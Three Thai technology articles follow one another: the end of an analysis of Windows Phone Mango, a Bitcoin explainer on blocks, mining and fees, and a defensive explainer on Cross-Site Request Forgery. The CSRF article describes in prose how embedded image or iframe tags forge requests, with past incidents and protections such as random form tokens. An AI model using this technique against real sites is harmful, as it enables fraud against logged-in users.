แน่นอนว่า Mango ยังขาดฟีเจอร์สำคัญๆ อีกหลายอย่างที่คู่แข่งอย่าง iPhone/Android มี แต่นั่นก็เป็นเพราะคู่แข่งล้ำหน้ามาในตลาดก่อนหลายปี ถ้ายังจำกันได้ 7 เดือนแรกหลัง iPhone/Android รุ่นแรกออก ตัวระบบปฏิบัติการยังด้อยกว่า WP7 ในเวลา 7 เดือนอยู่เยอะ (แต่ก็แน่นอนว่าสภาพตลาดก็ต่างกันเยอะ) ไมโครซอฟท์ยังฉลาดที่ประกาศอัพเกรด Mango ให้ฟรีกับมือถือ WP7 ทุกเครื่อง ช่วยรักษาความภักดีของแฟนๆ รุ่นแรกที่ช่วยสนับสนุนแพลตฟอร์มตลอดมา อีกประเด็นที่น่าสนใจคือการขยายตลาดของ Windows Phone Marketplace ซึ่งขยายจากยุโรปตะวันตก+สหรัฐ มาครอบคลุมยุโรปตอนกลาง เอเชียตะวันออก และอเมริกาใต้บางประเทศแล้ว ด้วยอัตราการขยายตัวแบบนี้ก็น่าจะครอบคลุมประเทศเศรษฐกิจสำคัญของโลกได้ในไม่อีกปี สรุปก็คือไมโครซอฟท์ใช้เวลาค่อนข้างดีในการพัฒนา Windows Phone ให้เติบโตและเข้มแข็งมากขึ้น (ถ้าไม่ไปทำเสียเรื่อง NoDo ให้แฟนๆ เซ็งจะดีกว่านี้) ถ้าให้เวลาไมโครซอฟท์อีกสัก 1 ปีก็น่าจะต่อกรกับคู่แข่งได้สมน้ำสมเนื้อมากขึ้น **2) แอพ** ตัวเลขจำนวนแอพใน Windows Phone Marketplace ที่ไมโครซอฟท์ประกาศเมื่อวานคือ 18,000 แอพ (ภาพจาก Engadget) ตัวเลขนี้เทียบไม่ได้เลยกับ 500,000 แอพของ iTunes App Store แต่ถ้าสังเกตดีๆ จะเห็นว่าไมโครซอฟท์ดึงผู้พัฒนาแอพรายสำคัญๆ ที่ผู้ใช้มักจะถามหามาได้เยอะมาก ไม่ว่าจะเป็น Flickr, Facebook, Twitter, Netflix, LinkedIn, Groupon, YouTube, Angry Birds รวมถึงแบรนด์ใหญ่ๆ อย่าง British Airways ที่โชว์ในงานแถลงข่าวเมื่อวานนี้ ส่วนฐานผู้พัฒนาเกมก็มีจาก Xbox บางส่วน และผู้พัฒนาเกมบนมือถือรายใหญ่ทั้ง GameLoft, EA มากันพร้อมหน้า ผู้ใช้ Android สมัยแรกๆ น่าจะพอระลึกได้ว่าช่วงแรกนั้น Android Market แทบไม่มีแอพจากเจ้าของแบรนด์รายใหญ่ทำเองเลย ต้องรอจนกระทั่ง Android จุดติด แบรนด์ทั้งหลายถึงแห่มาพัฒนาแอพของตัวเองกันในตอนหลัง ไมโครซอฟท์ไม่ซ้ำรอยความผิดพลาดนี้ และเข้าไปเจรจากับผู้พัฒนาแอพล่วงหน้า ซึ่งยุทธศาสตร์นี้ทำให้จำนวนแอพใน Windows Phone Marketplace ที่น้อยกว่าคู่แข่งไม่ใช่ปัญหาใหญ่เท่าไรนัก เพราะผู้ใช้เองก็มีแอพที่จำเป็นครบถ้วนในเบื้องต้น **3) ผู้ผลิตฮาร์ดแวร์ที่เพิ่มเข้ามา** ชัยชนะเล็กๆ ของ Windows Phone เมื่อวานนี้คือผู้ผลิตฮาร์ดแวร์ที่เข้ามาร่วมวงอีก 3 ราย ได้แก่ Acer, Fujitsu และ ZTE เมื่อรวมกับผู้ผลิตรายเดิมคือ Samsung, LG, HTC ก็ได้ผู้ผลิตฮาร์ดแวร์รายใหญ่ของโลกมาเกือบครบแล้ว (ขาดแต่ Sony Ericsson, Motorola, Huawei) และที่สำคัญอย่าเพิ่งลืมยักษ์ใหญ่อย่าง Nokia ที่ประกาศเข้ามาเป็นพันธมิตรตั้งแต่ต้นปี ด้วยโมเมนตัมระดับนี้ คงทำให้ Windows Phone มีพันธมิตรฮาร์ดแวร์ไม่ด้อยไปกว่า Android เท่าไรนัก และน่าจะช่วยให้ Windows Phone เดินหน้าต่อไปในยุทธภูมิมือถือได้อย่างมั่นคงแล้ว ผู้ผลิตฮาร์ดแวร์เหล่านี้มีจุดร่วมกันอย่างหนึ่งคือ "กลัวกูเกิลมีอำนาจต่อรองมากเกินไป" ซึ่งก็ทำอะไรไม่ได้เพราะไม่มีตัวเลือกที่ดีกว่า Android แต่เมื่อ Windows Phone เริ่มแสดงให้เห็นศักยภาพของตัวมันเอง ก็ไม่น่าแปลกใจอะไรที่ผู้ผลิตฮาร์ดแวร์เหล่านี้เข้าร่วมเพื่อ "คานอำนาจกูเกิล" และทำให้ไมโครซอฟท์มีอำนาจต่อรองมากขึ้น **4) โมเดลธุรกิจของ Windows Phone** สิ่งที่ไมโครซอฟท์ยังไม่พูดชัดเจนในตอนนี้คือ ไมโครซอฟท์จะหาเงินจาก Windows Phone ได้อย่างไร จริงอยู่ที่ไมโครซอฟท์คิดราคาค่าใช้งาน Windows Phone จากผู้ผลิตฮาร์ดแวร์ แต่รายได้จากตรงนี้คงไม่เยอะนัก เพราะผู้ผลิตฮาร์ดแวร์จะถูกบีบด้วยการแข่งขันในสงครามมือถือที่ดุมาก และคู่แข่งอย่าง Android ที่ลดราคาจนเหมือนให้เปล่า ยุทธศาสตร์การหาเงินของคู่แข่งไมโครซอฟท์นั้นชัดเจน แอปเปิลและ RIM ทำเงินจากการขายเครื่อง (ตรงไปตรงมา) ในขณะที่กูเกิลก็มาแบบพิสดารที่ทำเงินจากโฆษณาและบริการเสริมอื่นๆ แต่ไมโครซอฟท์เองไม่ได้ทำฮาร์ดแวร์ และบริการออนไลน์ของไมโครซอฟท์ก็ยังไม่โดดเด่นเท่ากับกูเกิล จึงน่าสนใจว่าไมโครซอฟท์จะทำเงินจาก Windows Phone ในระยะยาวได้อย่างไร (แม้ว่าไมโครซอฟท์จะมีเงินถุงเงินถังในมือเหลือเฟือ พอที่จะยอมขาดทุนกับ Windows Phone ได้อีกหลายปี แต่สุดท้ายแล้วก็ต้องมีโมเดลการสร้างรายได้อยู่ดี)
# BitCoin เมื่อโลกเทคโนโลยีปลดแอกการเงินจากธนาคาร โลกการเงินทุกวันนี้ถูกควบคุมด้วยธนาคารชาติต่างๆ และสถาบันการเงินระหว่างประเทศ ธนาคารชาติต่างๆ มีอำนาจในการกำหนดค่าเงินของตัวเองด้วยกระบวนการต่างๆ เช่น การกำหนดระดับดอกเบี้ย, เงินสำรองของธนาคาร, หรือการพิมพ์เงินออกมาสู่ตลาด นอกจากการกำหนดค่าเงินแล้ว หน่วยงานเหล่านี้ยังมีอำนาจในการตามรอยการเงินของผู้ใช้ผ่านทางการควบคุมธนาคาร รัฐบาลประเทศต่างๆ มีอำนาจในการหยุดธุรกรรมทางการเงินของบุคคลได้ หรือการกระทำอย่างสุดโต่งเช่นในปี 1987 ที่รัฐบาลพม่าประกาศยกเลิกธนบัตร 25, 35, และ 75 จ๊าด โดยไม่มีการเตือนล่วงหน้าทำให้เงินหายไปจากระบบถึง 75% แนวคิดการสร้างระบบการเงินที่ควบคุมด้วยเทคโนโลยีแทนที่นโยบายการเงินจากธนาคารจึงมีขึ้นในหมู่แฮกเกอร์มานานแล้ว แต่สุดท้ายในวันนี้ระบบที่ได้รับการยอมรับสูงสุด คือ BitCoin คำถามของตัวผมเองกับระบบนี้คือ ทำไมระบบนี้จึงปลอดภัย หลังจากนั่งอ่านอยู่พักใหญ่ๆ วันนี้เราจะลองมาดูกันว่าระบบของ BitCoin คืออะไรและมันเข้ามาเป็นระบบการเงินใหม่ได้อย่างไร BitCoin สร้างขึ้นโดย Satoshi Nakamoto บุคคลลึกลับที่อ้างว่าตัวเองมาจากประเทศญี่ปุ่น แต่ไม่มีข้อมูลอื่นใดเดี่ยวกับตัวเขา เขาใช้อีเมลจากบริการฟรีเพื่อพูดคุยใน[เมลลิ่งลิสด้านการเข้ารหัส](http://www.mail-archive.com/[email protected]/msg10001.html) [เขาเริ่มพัฒนา BitCoin ในปี 2007](https://bitcointalk.org/index.php?topic=13.msg46#msg46) และเปิดเผยมันออกมาในปี 2009 ([เอกสารการออกแบบ (PDF)](http://bitcoin.org/bitcoin.pdf)) จากนั้นจึงค่อยๆ ลดบทบาทตัวเองลงไป จนกระทั่งหายตัวไปในที่สุด เชื่อกันว่าชื่อ Satoshi ถูกสร้างขึ้นโดยเฉพาะเพื่อโครงการนี้ เมื่อพิจารณาจากความเชี่ยวชาญด้านการเข้ารหัสที่สูงมาก แต่กลับไม่มีชื่อนี้ในวงการวิชาการการเข้ารหัส เช่น บทความในวารสารวิชาการหรืองานประชุมวิชาการใดๆ ที่เป็นที่รู้จัก โดเมนหลักของโครงการคือ [BitCoin.org](http://bitcoin.org/) นั้นถูกจดทะเบียนกับบริษัทรับจดทะเบียนแบบปกปิดตัวตนก่อนจะโอนให้กับ Martti Malmi หนึ่งในนักพัฒนาหลักของโครงการชาวฟินแลนด์ สิ่งที่ระบุตัวตนของ Satoshi เข้าได้จริงๆ มีเพียง[กุญแจ PGP](http://forum.bitcoin.org/Satoshi_Nakamoto.asc) ที่ใช้ติดต่ออีเมลกับเขาเท่านั้น BitCoin เป็นหน่วยเงินใช้ชื่อย่อสกุลเงินว่า BTC ใช้สัญลักษณ์ B⃦ แทนหน่วยเงินแต่เนื่องจากเป็นอักขระที่ไม่ได้รับความนิยม หลายครั้งเราจึงเห็นเว็บที่รับเงิน BitCoin ใช้สัญลักษณ์เงินบาท (฿) แทน โดยตัวเงินจะสามารถแบ่งย่อยไปได้ถึงทศนิยมแปดหลัก เรียกหน่วยย่อยที่สุดว่า satoshi ตามชื่อผู้ให้กำเนิดมัน การออกแบบของ BitCoin อาศัยการเชื่อมต่อ P2P ของโลกอินเทอร์เน็ตเป็นหลัก โดยหลักการแล้ว การโอนเงินทุกครั้งจะต้องประกาศออกไปยังคอมพิวเตอร์ทุกเครื่องในโลกที่รันโปรแกรม BitCoin อยู่ ทำให้ทุกคนรับรู้ว่ามีการโอนเงินก้อนใดไปยังใครบ้าง เงินแต่ละก้อนสามารถแตกออกเป็นเงินย่อยๆ ได้ ทุกครั้งที่คนๆ หนึ่งจะโอนเงินไปให้กับคนอื่นจะเป็นการแตกเงินออกเป็นสองก้อน นั่นคือการโอนให้ยังปลายทาง และที่เหลือโอนกลับเข้าตัวเอง การถือเงินใน BitCoin จะอาศัยการสร้างกระเป๋าเงินดิจิตอลที่มีสิ่งอ้างอิงคือ BitCoin address ที่เป็นตัวเลขผสมตัวอักษรยาว 34 ตัวอักษร เช่น `19kgqNAaq983PXpaxeZSvLTcuieiVojmrN` โดยกระเป๋าเงินดิจิตอลแต่ละใบจะมีกุญแจลับเป็นของตัวเอง หากกุญแจนี้หายไป เงินทั้งหมดในกระเป๋านั้นจะหายไปตลอดกาล และเนื่องจากระบบของ BitCoin เป็น P2P ทำให้เราสามารถเข้าไปดูกระเป๋าเงินของใครก็ได้ เช่นกระเป๋าเงิน [19kgqNA... ตัวอย่างข้างต้น สามารถดูได้ที่ Block Explorer](https://blockexplorer.com/address/19kgqNAaq983PXpaxeZSvLTcuieiVojmrN) ว่ามีการโอนจากกระเป๋าเงินใบอื่นเมื่อไรเป็นจำนวนเงินเท่าใด เมื่อสองเดือนก่อน นิตยสาร Forbes สามารถ[จัดอันดับเศรษฐี BitCoin](http://www.forbes.com/sites/jonmatonis/2012/06/22/the-bitcoin-richest-accumulating-large-balances/) ได้ว่าบัญชีใดมีเงินเท่าใด และใช้จ่ายไปกี่ครั้ง เช่น บัญชีอันดับหนึ่ง [1DkyBEKt5S2GDtv7aQw6rQepAvnsRyHoYM](https://blockchain.info/address/1DkyBEKt5S2GDtv7aQw6rQepAvnsRyHoYM) มีเงินกว่า 500,000 BTC คิดเป็นมูลค่ากว่าหกล้านดอลลาร์ หรือประมาณสองร้อยล้านบาท แม้จะตรวจสอบการโอนทั้งหมดได้ ใครๆ ก็สามารถสร้างกระเป๋าเงิน BitCoin ขึ้นใช้งานเองได้ และมีคนจำนวนมากที่ถือหลายกระเป๋าเพื่อปกปิดตัวตน หรืออาจจะมีคนกระจายเงินไปยังกระเป๋าเงินหลายใบเพื่อไม่ให้ตัวเองตกเป็นเป้าการตรวจสอบ กระบวนการที่สำคัญของ BitCoin คือการยืนยันว่ามีการโอนเงินแล้วจริง โดยปกติแล้วในระบบเงินทั่วไป เราเชื่อใจระบบธนาคารว่าจะดูแลให้การโอนเงินของเราเป็นไปอย่างถูกต้อง แต่ BitCoin ถูกออกแบบให้ทุกคนช่วยการยืนยันการโอนเงินซึ่งกันและกัน เมื่อผู้ใช้ในเครือข่ายประกาศการโอนเงินจะ ข้อความประกาศเหล่านั้นจะถูกรวบเข้าด้วยกันเป็นชุด แล้วคำนวณหาค่าแฮช (hash) แบบ SHA256 เรียกว่า บล็อค (Block) ตัวอย่าง เช่น [บล็อคหมายเลข 194462](https://blockexplorer.com/block/000000000000025efb782f799217886ec068fc6f2f0c07178721fe80c2334e63) มีการโอนที่ถูกรวบรวมเข้ามา 209 รายการ รวมเป็นมูลค่า 8979.63213863 BTC การยืนยันการโอนแต่ละบล็อคเป็นงานที่ออกแบบให้ยากในระดับที่สร้างบล็อคใหม่ได้ในเวลาประมาณสิบนาที หลักการคือผู้ที่จะคำนวณค่ายืนยันบล็อคแต่ละอัน จะต้องปรับค่า nonce ที่ใช้เติมในแต่ละบล็อคเพื่อให้แฮชค่าของทั้งบล็อคแล้วได้คุณสมบัติตามที่กำหนด ค่าความยาก (difficulty) นี่คือการกำหนด "ค่าเป้าหมาย" (target) ที่ยอมรับได้ของแฮชของบล็อคนั้นๆ แต่ใน SHA256 กำหนดค่า nonce เพื่อให้ได้ค่าแฮชที่น้อยตามที่ต้องการเป็นงานที่ยังไม่มีทางทำได้ตามทฤษฎี ทางที่เป็นไปได้คือการไล่ค่า nonce ไปเรื่อยๆ ทีละค่าแล้วคำนวณแฮชใหม่จนกว่าจะได้ค่าตามคุณสมบัติที่กำหนด โดยโพรโทคอลของ BitCoin จะกำหนดให้ค่าความยากนี้ใหม่ทุกๆ 2016 บล็อค โดยคำนวณจากความยากปัจจุบันและระยะเวลาเฉลี่ยที่คำนวณแต่ละบล็อคในช่วงเวลาสองสัปดาห์ที่ผ่านมา แต่ไม่สามารถปรับค่าความยากให้ยากขึ้นเกินกว่า 4 เท่าตัวได้ในการปรับแต่ละครั้ง ทุกวันนี้ค่าแฮชที่ยอมรับได้จะมีเลขศูนย์นำหน้าถึง 13 ตัว เช่น `00000000000006b6470a28d420c957609e22f56c5f3a58dfe9ad4d498f63e3fa` การหาค่า nonce ที่ทำให้ค่าแฮชเป็นไปตามเงื่อนไขนี้จะต้องอาศัยการลองผิดลองถูกนับล้านล้านครั้ง หลังจากนั้นเมื่อเครื่องใดเครื่องหนึ่งในเครือข่ายสามารถคำนวณค่า nonce และแฮชที่ถูกต้องของบล็อคปัจจุบันได้ ก็จะประกาศไปทั่วเครือข่าย การตรวจสอบความถูกต้องนั้นทำได้ง่ายเพราะเป็นเพียงการดูไฟล์บล็อคที่มักมีขนาด 50-200KiB แล้วคำนวณแฮช SHA256 ว่าตรงกับที่ประกาศออกมาหรือไม่ และซอฟต์แวร์จะถูกกำหนดให้รับฟังการประกาศบล็อคล่าสุดเสมอ การปรับค่าความยากให้ระยะเวลาสร้างบล็ิอคใหม่ได้ในสิบนาที เป็นความพยายามที่จะสมดุลกันระหว่างความปลอดภัย โดยคนโจมตีจะสร้างห่วงโซ่บล็อคปลอมๆ ได้ยากมาก ขณะที่การใช้จ่ายเงินจะได้รับการยืนยันว่าอยู่ในห่วงโซ่สายหลักแน่นอน (มีบล็อคต่อท้ายไปอีก 6 บล็อค) ภายในเวลาประมาณหนึ่งชั่วโมง ซึ่งไม่นานเกินไปสำหรับการใช้งานซื้อขายที่ไม่ต้องการความเร็วสูงๆ เช่น การซื้อหุ้น แต่ละบล็อคของ BitCoin จะอ้างถึงบล็อคก่อนหน้าหนึ่งบล็อคเสมอ ทำให้แต่ละบล็อคอ้างถึงกันเป็นลูกโซ่ไปข้างหน้าทางเดียว การคำนวณค่าบล็อคปัจจุบันจึงเป็นการยืนยันความถูกต้องของบล็อคก่อนหน้า โดยปกติแล้วซอฟต์แวร์กระเป๋าเงิน BitCoin จะแจ้งผู้ใช้ว่าการโอนเงินได้รับการยืนยันต่อเมื่อบล็อคที่บันทึกการโอนเงินถูกอ้างถึงไปอีก 6 บล็อคข้างหน้า การคำนวณค่า nonce และแฮชของแต่ละบล็อคนั้นเป็นงานที่มีต้นทุนสูงเพราะต้องใช้ไฟฟ้าและเครื่องที่แรงจึงคำนวณได้รวดเร็ว หลายค่ายสร้างชิปเฉพาะสำหรับการคำนวณค่าบล็อค กระบวนการนี้มีแรงจูงใจระบุให้ผู้ที่สามารถคำนวณ ค่า nonce และแฮชได้สำเร็จ สามารถประกาศนำเงินเข้ากระเป๋าตัวเองได้ 50 BTC (มูลค่าปัจจุบ้นคือ 600 ดอลลาร์หรือเกือบสองหมื่นบาท) เงินจำนวนนี้จะลดลงเหลือครึ่งหนึ่ง ทุกๆ 210,000 บล็อคที่คำนวณได้ กระบวนการนี้เป็นแนวคิดที่จะจำกัดจำนวน BitCoin ไม่ให้เกิน 21,000,000 BTC เนื่องจากไม่มีศูนย์กลางควบคุม จึงเป็นไปได้ที่จะมีเครื่องคอมพิวเตอร์หลายเครื่องในโลก คำนวณบล็อคใหม่ออกมาได้พร้อมกัน โดยมีจำนวนข้อมูลการโอนไม่เท่ากันและค่า nonce และแฮชที่แตกต่างกัน ทำให้เกิดการ "แตกสาย" ของฐานข้อมูล BitCoin อาศัยแนวคิดว่าเครื่องส่วนใหญ่ในโลกนั้นเป็นเครื่องที่ดีและคำนวณอย่างซื่อสัตย์ เมื่อเกิดการแตกสายของฐานข้อมูลเครื่องทุกเครื่องจะเลือกสายที่ยาวที่สุด นั่นคือ เมื่อมีการคำนวณบล็อคลำดับเดียวกันได้พร้อมๆ กัน ทั้งสองสายจะต้องแข่งกันคำนวณบล็อคต่อไปให้เร็วที่สุด หากบล็อคใดแพ้ สายนั้นจะถือเป็นสายกำพร้า (Orphaned Block) และคอมพิวเตอร์ทุกเครื่องในเครือข่ายจะไม่สนใจต่อสายนั้นอีกต่อไป ทำให้ผู้ที่คำนวณบล็อคได้สำเร็จและได้รับเงิน 50BTC ถูกยกเลิกเงินของตัวเอง เพราะเงินที่ได้รับจะถูกบันทึกในสายหลักเท่านั้น การคำนวณโซ่ของบล็อค (Block Chain) ใหม่จะใช้ทรัพยากรมหาศาล เช่นทุกวันนี้ที่มีจำนวนบล็อคในโลกเกือบสองแสนบล็อค ในภาพรวมแล้วทั้งโลกจึงมีฐานข้อมูลการโอนเงินเพียงฐานข้อมูลเดียวที่มองเห็นเหมือนกันทั่วโลก ทุกวันนี้การคำนวณบล็อคใหม่จะใช้เวลา 5-10 นาที ในช่วงแรกโปรแกรมกระเป๋าเงิน BitCoin จะเปิดให้ทุกเครื่องช่วยกันคำนวณบล็อคนี้ไปพร้อมๆ กัน แต่เนื่องจากการคำนวณยากขึ้นเรื่อยๆ จนคอมพิวเตอร์ธรรมดาไม่สามารถคำนวณได้ทันและจะมีคอมพิวเตอร์เพียงเครื่องเดียวในระบบที่ได้รับเงิน 50BTC ไปในแต่ละบล็อค ช่วงหลังจึงมีการรวมกลุ่มแบบต่างๆ เพื่อเร่งคำนวณค่า nonce และแฮชให้เร็วขึ้นเรื่อยๆ กลายเป็นการแข่งขันคำนวณค่า SHA256 ขนานใหญ่ทั่วโลก หลายกลุ่มอาศัยชิปกราฟิกเพื่อจะคำนวณค่าให้เร็วขึ้น บางกลุ่มใช้ชิป FPGA ที่ออกแบบมาเป็นพิเศษเพื่อช่วยเร่งการคำนวณ บางกลุ่มเปิดรับสมาชิกจากภายนอกโดยมีสัญญากันว่าจะแบ่งเงินให้ตามสัดส่วนที่คำนวณได้ ไม่ว่าจะเป็นผู้คำนวณบล็อคได้สำเร็จหรือไม่ เรียกว่า mining pool ระบบของ BitCoin ยังเปิดให้ผู้โอนเงินสามารถโอนค่าธรรมเนียมเข้าไปยังผู้ที่คำนวณบล็อคได้สำเร็จ แนวทางนี้ทำให้การโอนเงินแต่ละครั้งถูกบันทึกไม่พร้อมกัน เพราะผู้ที่คำนวณบล็อคจะพยายามดึงรายการโอนเงินที่มีค่าธรรมเนียมเข้าสู่บล็อคที่ตัวเองกำลังคำนวณก่อนเสมอ ระบบสุดท้ายแล้วเมื่อเงินฟรีที่ได้รับจากคำนวณบล็อคหมดไป ทุกคนจะต้องจ่ายค่าธรรมเนียมเพื่อให้การโอนเงินของตัวเองได้รับการบันทึก ระบบการโอนเงินและค่าธรรมเนียมจะเป็นระบบเสรี คือ ถ้าเราประกาศค่าธรรมเนียมการโอนน้อยเกินไป ผู้คำนวณบล็อคจะไม่สนใจรวมรายการโอนเงินของเราเข้าสู่บล็อคของตัวเองที่กำลังคำนวณ ในอนาคตเราจะรู้ได้ว่าเราต้องประกาศค่าธรรมเนียม "ประมาณเท่าใด" จึงได้รับการบันทึกลงในฐานข้อมูล นั่นคือคนที่คำนวณบล็อคที่คำนวณได้เร็วที่สุด ยอมรับรายการโอนของเราเข้าไปคำนวณในบล็อคให้ ทั้งหมดคือมุมมองในเชิงเทคโนโลยีของ BitCoin ความน่าทึ่งของมันไม่ได้หยุดอยู่ที่การเป็นระบบการเงินที่เปิดเผยทุกอย่าง มันยังสร้างมุมมองใหม่ๆ ในเชิงเศรษฐกิจที่น่าสนใจ เพราะระบบการเงินทั่วไปในโลกนั้นเงินในระบบมีจำนวนมากขึ้นเรื่อยๆ ผ่านการพิมพ์เงินของธนาคารกลาง แต่ในระบบ BitCoin ไม่สามารถเพิ่มเงินในระบบได้ เราจะกลับมามาสำรวจมุมมองทางการเงินต่อ BitCoin อีกครั้งในบทความตอนต่อไป
# การโจมตีเว็บแบบ Cross Site Request Forgery ความปลอดภัยคอมพิวเตอร์ในสมัยใหม่เปลี่ยนจากการโจมตีช่องโหว่ของบริการต่างๆ หรือบั๊กของซอฟต์แวร์โดยตรงมาเป็นการโจมตีจากกระบวนการตรวจสอบความปลอดภัยที่ตามไม่ทันกับรูปแบบการใช้งานที่หลากหลายขึ้นเรื่อยๆ เช่น การใช้งานเว็บยุคใหม่ที่มีความซับซ้อน มีการวางไฟล์จากเซิร์ฟเวอร์จำนวนมากเข้ามาแสดงผลบนหน้าเว็บเดียวกัน, มีการรันสคริปต์บนหน้าเว็บ, และมีการใช้งานเพื่อการทำงานสำคัญกว่าการเข้าอ่านเนื้อหาบนเว็บไปอีกมากมาย การโจมตีเว็บสามารถถูกโจมตีจากช่องโหว่เช่น Buffer Overflow ได้เช่นเดียวกันกับซอฟต์แวร์ทุกตัวในโลก แต่ช่องโหว่ที่เฉพาะสำหรับเว็บนั้นมีอยู่จำนวนหนึ่ง นับแต่บั๊กที่เปิดให้ผู้ใช้อัพโหลดสคริปต์ขึ้นไปรันบนเว็บได้ด้วยตัวเอง ไปจนถึงการตรวจสอบสิทธิผู้ใช้ด้วยยูอาร์แอลเพียงอย่างเดียว ทำให้เมื่อผู้ใช้แชร์ยูอาร์แอลไป เกิดเหตุการณ์ข้อมูลส่วนตัวรั่วไปได้อย่างง่ายดาย แต่มีช่องโหว่ที่มีการใช้งานจริงและมักนึกไม่ถึงสองบั๊กได้แก่ Cross Site Request Forgery (CSRF) และ Cross Site Scripting (XSS) ที่ควรได้รับการกล่าวถึงเป็นพิเศษ ในตอนนี้จะอธิบายถึง CSRF ก่อน ### Cross-Site Request Forgery Cross Site Request Forgery (CSRF) เป็นการโจมตีไปยังตัวผู้ใช้ของเว็บที่ไม่ได้รักษาความปลอดภัยดีพอ โดยทั่วไปแล้วเว็บจำนวนมากมักรักษาความปลอดภัยด้วยการสร้าง คุกกี้ระหว่างกระบวนการล็อกอิน เมื่อผู้ใช้เข้าใช้หน้าต่างๆ ในเว็บก็จะตรวจสอบหมายเลขในคุกกี้ (หมายเลขคุกกี้เพื่อตรวจสอบผู้ใช้นี้เองก็มีประเด็นความปลอดภัยอยู่ เช่นการสร้างเลขไล่ไปเรื่อยๆ ทำให้ผู้ใช้สามารถเดาคุกกี้ยืนยันตัวตนของคนอื่นๆ ได้) หากหลังจากมีคุกกี้ยืนยันตัวตนแล้ว ผู้ใช้สามารถส่งฟอร์มเพื่อสั่งการบนเว็บได้โดยตรง เช่น การส่งเมล หรือการสั่งโอนเงิน ฟอร์มเหล่านี้มักรับค่าได้จากตัวยูอาร์แอลโดยตรง ทำให้แฮกเกอร์มีโอกาสที่จะสร้างเว็บแล้วฝังโค้ดที่แทรกยูอาร์แอล เช่น แท็ก <img> หรือ <iframe> ที่สามารถใส่ src เป็นยูอาร์แอลอะไรของเว็บอื่นๆ ได้ จากการเขียนโปรแกรมเว็บที่บ่อยครั้งไม่มีการแยกระหว่างค่าที่ได้จากการ POST ฟอร์ม และการ GET ผ่านยูอาร์แอล หรือแม้กระทั่งการใช้ POST เพียงอย่างเดียวก็อาจมีบางหน้าเว็บที่ถูกฝังสคริปต์เพื่อสั่งให้ POST ฟอร์มได้ ปัญหา CSRF ดูจะไม่ใช่ปัญหาที่ซับซ้อนนัก แต่ในความเป็นจริงมันเคยสร้างปัญหาให้เป็นวงกว้างมาหลายครั้ง - **The New York Times**: เว็บ [NYTimes.com](http://nytimes.com/) เคยมีบริการ "Email This" บนเว็บไซต์ของตัวเองโดยไม่มีการป้องกัน เมื่อคนร้ายทำยูอาร์แอลสร้างคำสั่งให้ส่งอีเมลไปยังเหยื่อ แล้วนำไปวางบนเว็บชื่อดัง ซึ่งส่วนมากมักยอมรับให้วางรูปด้วยแท็ก กันอยู่แล้ว ประกอบกับเว็บ NYTimes เป็นเว็บชื่อดัง มีผู้ใช้จำนวนมาก ที่ล็อกอินทิ้งเอาไว้ ปัญหานี้ได้รับการแก้ไขเมื่อวันที่ 1 ตุลาคม 2008 ที่ผ่านมา - **ING Direct**: บริการที่น่ากังวลเมื่อเป็นบริการทางการเงิน มีผู้พบช่องทางการ POST โดยที่ผู้ใช้ไม่รู้ตัว ทำให้โอนเงินเข้าไปยังบัญชีคนร้ายได้ แม้ว่าเบราว์เซอร์จะมีการป้องกันไม่ให้จาวาสคริปต์ไปเรียก "อ่าน" ข้อมูลจากโดเมนที่ไม่ตรงกับของตัวเองได้ แต่กลับอนุญาตให้ส่ง request ไปยังเว็บต่างโดเมนได้ กรณีเช่นนี้การส่ง request ไปก็สร้างความเสียหายได้แล้ว - **YouTube**: เว็บดังอย่าง YouTube เองก็เคยถูกโจมตีด้วย CSRF เช่นกัน จากยูอาร์แอลของการเพิ่มวิดีโอเข้า playlist ที่ไม่มีการตรวจสอบล่วงหน้า และมี playlist พิเศษที่ทำให้ชื่อเป็น `add_to_favorite` ทำให้แฮกเกอร์สามารถเพิ่มวิดีโอที่ต้องการโปรโมทเข้าไปยังผู้ใช้ทุกคนได้ ### การป้องกัน กระบวนการป้องกันป้องกัน CSRF แบ่งออกเป็นการป้องกันจากฝั่งเซิร์ฟเวอร์และฝั่งของผู้ใช้เอง กระบวนการป้องกันจากเซิร์ฟเวอร์นั้นตัว**แอพพลิเคชั่นสามารถตรวจสอบจุดเริ่มต้น**ได้ว่า request ที่ส่งมานั้นมาจาก เว็บที่ควรเป็นจุดเริ่มต้นหรือไม่ผ่านค่า referrer เพื่อลดความเสี่ยงที่จะถูกโจมตีจากการฝังโค้ดไว้ในเว็บอื่น แต่ในกระบวนการป้องกันที่นิยมใช้กัน คือ **การสร้างค่าสุ่มเพื่อยืนยันการใช้งานว่าเป็นการใช้งานของผู้ใช้**จริง โดยในตัวฟอร์มที่สร้างขึ้นมา จะมีการแทรกค่าสุ่มขึ้นมาเป็นแบบซ่อนเอาไว้ภายใน และเวลาที่มีการ POST ฟอร์มจะนำค่าที่ซ่อนไว้นี้มาตรวจสอบอีกครั้งว่าเป็นค่าที่สุ่มออกไปเพื่อผู้ใช้คนที่กำลังส่งแบบฟอร์มจริงหรือไม่ กระบวนการเช่นนี้มีใช้งานกันอยู่แล้วใน CMS ชั้นนำส่วนมาก รวมถึงเฟรมเวิร์คหลักๆ ตัวอย่างเช่น [Django](https://docs.djangoproject.com/en/dev/ref/contrib/csrf/) ในฝั่งของผู้ใช้นั้น เราสามารถลดความเสี่ยงที่จะถูกโจมตีจาก CSRF ได้ด้วยการระมัดระวังการเข้าหน้าเว็บที่มีความเสี่ยงสูง เช่น เว็บแจกโปรแกรมเถื่อน, หรือเว็บภาพโป๊ทั้งหลาย เราสามารถติดตั้งส่วนเสริม [NoScript](https://addons.mozilla.org/en-us/firefox/addon/noscript/) สำหรับไฟร์ฟอกซ์ หรือ [ScriptNo](https://chrome.google.com/webstore/detail/scriptno/oiigbmnaadbkfbmpbfijlflahbdbdgdf) สำหรับ Chrome รวมไปถึงการใช้โหมด Inconito หรือ Private Browsing ในเบราว์เซอร์ทุกตัว เพื่อป้องกันไม่ให้เว็บที่มุ่งร้ายอาศัยการที่เราล็อกอินเว็บที่มีช่องโหว่ CSRF ได้ CSRF เป็นช่องโหว่ความพื้นฐานหนึ่งที่นักพัฒนามักผิดพลาดกันได้ง่าย และในความเป็นจริงการโจมตีค่อนข้างจำกัดหากเว็บยังมีคนใช้ไม่มากนัก แต่ระหว่างกระบวนการเหล่านี้เราไม่อาจรู้ได้ว่าในวันหนึ่งเว็บที่เราสร้างขึ้นอาจจะมีผู้ใช้มากพอที่จะเป็นคนร้ายมุ่งเป้ามายังบริการที่เราสร้างขึ้น โดยเฉพาะหากเว็บที่ให้บริการนั้นเป็นเว็บที่มีมูลค่าสูง ที่มา \- [Cross-Site Request Forgeries: Exploitation and Prevention (PDF)](https://www.cs.berkeley.edu/~daw/teaching/cs261-f11/reading/csrf.pdf), 